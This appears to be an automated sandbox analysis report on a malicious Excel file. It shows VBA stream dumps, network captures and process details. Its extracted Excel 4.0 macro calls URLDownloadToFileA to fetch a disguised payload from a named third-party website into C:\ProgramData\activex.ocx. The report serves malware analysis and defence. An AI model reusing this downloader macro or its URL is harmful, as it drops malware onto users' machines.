Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 92 95 36 3e 63 64 7d ad 40 7b f5 0a f4 3c 39 e8 60 2d b6 bc c7 d7 22 ab 3c c4 2a 9a 0f 36 32 5c 19 f5 e4 05 cb 5b bc 99 cb 9a 50 d8 28 8c eb 19 e1 00 02 00 b0 04 c1 00 02 00 74 f3 e2 00 00 00 5c 00 70 00 df 94 21 f2 c1 f7 f6 ae 8e e7 8c 02 fd 7b db 24 38 d5 a3 8a b0 a5 02 f8 06 ce 29 af e8 34 |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECT |
File Type: | ISO-8859 text, with CRLF line terminators |
Stream Size: | 387 |
Entropy: | 5.00967281416 |
Base64 Encoded: | True |
Data ASCII: | I D = " { C 4 7 7 9 5 8 8 - 7 8 B C - 4 0 2 C - 9 C 2 8 - 3 4 8 E A A E D 9 5 6 B } " . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 5 6 9 E 5 A 9 E 5 A 9 E 5 A 9 E 5 A " . . D P B = " 5 3 5 1 A 4 F A 5 7 F B 5 7 F B 5 7 " . . G C = " 0 5 0 7 F 2 4 C 1 6 F F 1 7 F F 1 7 0 0 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 |
Data Raw: | 49 44 3d 22 7b 43 34 37 37 39 35 38 38 2d 37 38 42 43 2d 34 30 32 43 2d 39 43 32 38 2d 33 34 38 45 41 41 45 44 39 35 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
File Type: | data |
Stream Size: | 20 |
Entropy: | 3.04643934467 |
Base64 Encoded: | False |
Data ASCII: | . . . . 1 . . . 8 . A . B . 1 . . . . . |
Data Raw: | cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2767 |
Entropy: | 3.97981669814 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . |
Data Raw: | cc 61 a3 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 728 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
File Type: | data |
Stream Size: | 728 |
Entropy: | 6.37265666305 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ) 3 . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 d4 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 29 33 e3 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Stream Path: _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1127 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901 |
File Type: | data |
Stream Size: | 1127 |
Entropy: | 3.56364076858 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . $ . . . . . . . 8 . . . . . . . . . . . . . . . H . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . L i s t B o x 1 , 2 , 0 , M S F o r m s , L i s t B o x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . |
Data Raw: | 01 16 01 00 00 14 01 00 00 18 03 00 00 f8 00 00 00 24 02 00 00 ff ff ff ff 38 03 00 00 8c 03 00 00 00 00 00 00 01 00 00 00 48 1c e9 9f 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Macro 4.0 Code |
---|
CALL("URLMon", "URLDownloadToFileA", "JJCCJJ", 0, ="https://www.penrithdentalimplants.com.au/ls/apperolew.png", C:\ProgramData\activex.ocx, 0, 0)
"=""https://www.penrithdentalimplants.com.au/ls/apperolew.png""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:07.085342884 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.273987055 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.274081945 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.283557892 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.471865892 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479675055 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479729891 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479768038 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.480004072 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.514084101 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.707853079 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.707982063 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:08.878242970 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.106628895 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276684999 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276724100 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276753902 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276793003 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276828051 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276865005 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276901007 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276920080 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.276947975 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276989937 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.276989937 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277025938 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277029037 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277034998 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277065992 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277079105 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277086020 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277105093 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277134895 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277139902 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277168989 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277173042 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277200937 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277214050 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277235031 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277260065 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277267933 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277301073 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277314901 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277337074 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277348042 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277374029 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277399063 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277420998 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277442932 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277478933 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277504921 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277524948 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277530909 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277565002 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277575970 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277601004 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277602911 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277638912 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277654886 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277667046 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277686119 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277703047 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277714014 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277740002 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277741909 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277776957 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277795076 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277823925 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277822971 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277863979 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277899981 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277915001 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277936935 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277947903 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277973890 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277973890 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278009892 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278026104 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278047085 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278078079 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278084040 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278110027 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278131008 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278137922 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278162956 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278196096 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278198957 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278227091 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278235912 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278249979 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278273106 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278283119 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278307915 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278326035 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278356075 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.283272028 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.466720104 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466777086 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466815948 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466854095 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:07.055907011 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.122844934 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.170912027 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.184622049 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.232651949 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | penrithdentalimplants.com.au | CNAME (Canonical name) | IN (0x0001) | ||
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 160.153.76.195 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.479768038 CET | 160.153.76.195 | 443 | 192.168.2.22 | 49167 | CN=penrithdentalimplants.com.au, O=Nepean Dental Implants and Cosmetic Dentistry, L=Penrith, ST=New South Wales, C=AU CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Aug 07 20:52:48 CEST 2020 Tue May 03 09:00:00 CEST 2011 | Wed Oct 06 15:19:58 CEST 2021 Sat May 03 09:00:00 CEST 2031 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 13:00:41 |
Start date: | 05/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f220000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
